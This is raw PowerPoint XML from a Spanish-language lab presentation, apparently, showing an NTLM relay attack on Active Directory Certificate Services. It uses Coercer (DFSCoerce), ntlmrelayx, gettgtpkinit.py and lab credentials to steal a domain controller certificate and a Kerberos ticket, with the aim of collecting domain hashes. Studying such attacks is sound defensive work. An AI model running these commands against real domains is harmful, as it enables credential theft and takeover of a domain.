            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> copie de C:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Instalar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>hfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> file server 2,3,a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Unir al dominio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>google.local</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="274345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88743F-0ABD-4C2B-39C7-4472C9BFC049}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Coerce (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>DFSCoerce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{649016FC-7F9B-36CB-F882-D188247D3EF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>El objetivo de este ataque será conseguir todos los hashes NTLM de los usuarios del dominio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google.local</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s-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="44546A"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Herramientas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800"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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES"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Coerce -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" u="sng"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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/p0dalirius/Coercer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES"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ntlmrelayx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"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de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"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Impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"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s-ES" u="sng"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https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES"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PKINITtools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"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s-ES" u="sng"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https://github.com/dirkjanm/PKINITtools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buFont typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES"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Minikerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"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s-ES" u="sng"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hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/skelsec/minikerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES"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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3561639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7CFA1FA-3532-A16E-F51C-77D0195D0668}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677333" y="352926"/>
            <a:ext cx="11017361" cy="6505073"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Comenzamos ejecutando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>ntlmrelayx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> , que nos ayudará a transmitir la solicitud de autenticación del servidor AD CS al controlador de dominio y luego responder con la respuesta de autenticación que recibe. Luego podemos capturar el certificado base64 de la cuenta DC$ que envía el servidor AD CS. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Cuadro de texto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1556F26-3FCE-A295-FCA3-6AE8462108F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1168700" y="1934628"/>
            <a:ext cx="2475230" cy="935355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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sudo python3 ntlmrelayx.py -t http://192.168.1.79/certsrv/certrqus.asp -smb2support --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>adcs</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template</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DomainController</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1100" kern="100" dirty="0">
              <a:effectLst/>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F2BC317D-CB69-4649-FBEB-83BBB8ADFB6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470802" y="1918200"/>
            <a:ext cx="5400040" cy="4692701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2333516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79BE47A-B526-3387-7FD2-26C7A180B15F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="545433"/>
            <a:ext cx="10856940" cy="5495930"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Ahora ejecutaremos el script de Coerce:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Siendo -u el nombre de usuario, -p la contraseña, -d el dominio, -l la IP que va escuchar y a la que se le enviaran los hashes, -t la IP del objetivo, en este caso el servidor dos de Windows server, --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>-continue para que haga el ataque sin preguntar nada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Cuadro de texto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50F0C387-3AA3-57B4-8E2F-9E921FC80262}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1232869" y="1918586"/>
            <a:ext cx="2475230" cy="93535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python3 Coercer.py coerce -l 192.168.1.44 -t 192.168.1.80 -u Alesander -p abc123. -d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>google.local</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always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-continue   -v</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1881957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ADAC1747-537C-C09D-D6FA-E9ECCB7B74AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677333" y="320843"/>
            <a:ext cx="11290077" cy="6224336"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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Consiguiendo el token:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Imagen 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF9EDA3E-9CF1-64B4-CF80-E1BDDDF361E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76317" y="320843"/>
            <a:ext cx="5400040" cy="2719705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagen 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4DC1C8E-1719-B45D-D9DD-B304092FE8F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6317" y="4138295"/>
            <a:ext cx="5400040" cy="2519179"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2743103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F65AED7-1FB1-170C-B36F-64F8A29A9ADC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677333" y="176463"/>
            <a:ext cx="10985277" cy="6304548"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Ahora conseguiremos el certificado de la autentificación del servidor dos en nuestra máquina atacante, en el servidor de certificados del servidor uno. Ntlmrelax.py está esperando a que le llegue algún hash para enviárselo al servidor de certificados, en este caso el servidor uno, cuando eso ocurra mostrará el certificado:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF0DBC29-3F92-C8C9-F09C-7DDB43DF369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57580" y="1993749"/>
            <a:ext cx="7631928" cy="4102251"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1851743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17433F-FBC8-66A0-FE3B-8DF906A14A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="497305"/>
            <a:ext cx="10953192" cy="5855369"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Ahora copiare el certificado encriptado en base64 en un fichero llamado cert.txt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Desencriptaremos el fichero cert.txt, para eso lo convertiremos en un .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>pfx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>, que será el tipo de fichero que tendremos que usar después:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Cuadro de texto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92DBF4D0-E9FE-81F2-7572-99456E87AC46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1152659" y="2691798"/>
            <a:ext cx="2475230" cy="38354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a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cat cert.txt | base64 -d &gt; cert.pfx</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Imagen 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCD7D178-74A2-3095-732D-0EB52D7056B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1152659" y="3424989"/>
            <a:ext cx="2923809" cy="1142857"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3734944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A5A313-6532-5248-C1C3-BA1B4844A929}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="448056"/>
            <a:ext cx="10944690" cy="5980175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Lo que intentaremos hacer es usar este certificado .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>pfx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>, para autentificarnos en el controlador de dominio y así obtener el ticket de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>, para eso voy usar una herramienta que se llama gettgtpkinit.py, perteneciente al paquete </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>PKINITtools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Cuadro de texto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2065AC9F-184A-D8CE-2D87-DAF8574435A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1184743" y="2235249"/>
            <a:ext cx="2475230" cy="75120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sudo python3 gettgtpkinit.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>google.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/DC02\$ -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cert-pfx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> /home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>parrot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cert.pfx</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out.ccache</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1100" kern="100" dirty="0">
              <a:effectLst/>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3967562F-8E93-516C-8886-ADCFEDEB91BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1184743" y="3283533"/>
            <a:ext cx="5371429" cy="2847619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="95397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4F89FF2-71D8-1005-2C4B-374FCB5112D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677333" y="481263"/>
            <a:ext cx="11001319" cy="5967663"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Consiguiendo el ticket Kerberos:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{431445B9-A59A-4472-A724-EEB56DA227EC}"/>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9875" y="1418790"/>
            <a:ext cx="5400040" cy="4580957"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3650208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6A9D912-76E4-38C9-9288-A0077EB610B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="561474"/>
            <a:ext cx="10905066" cy="5775157"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
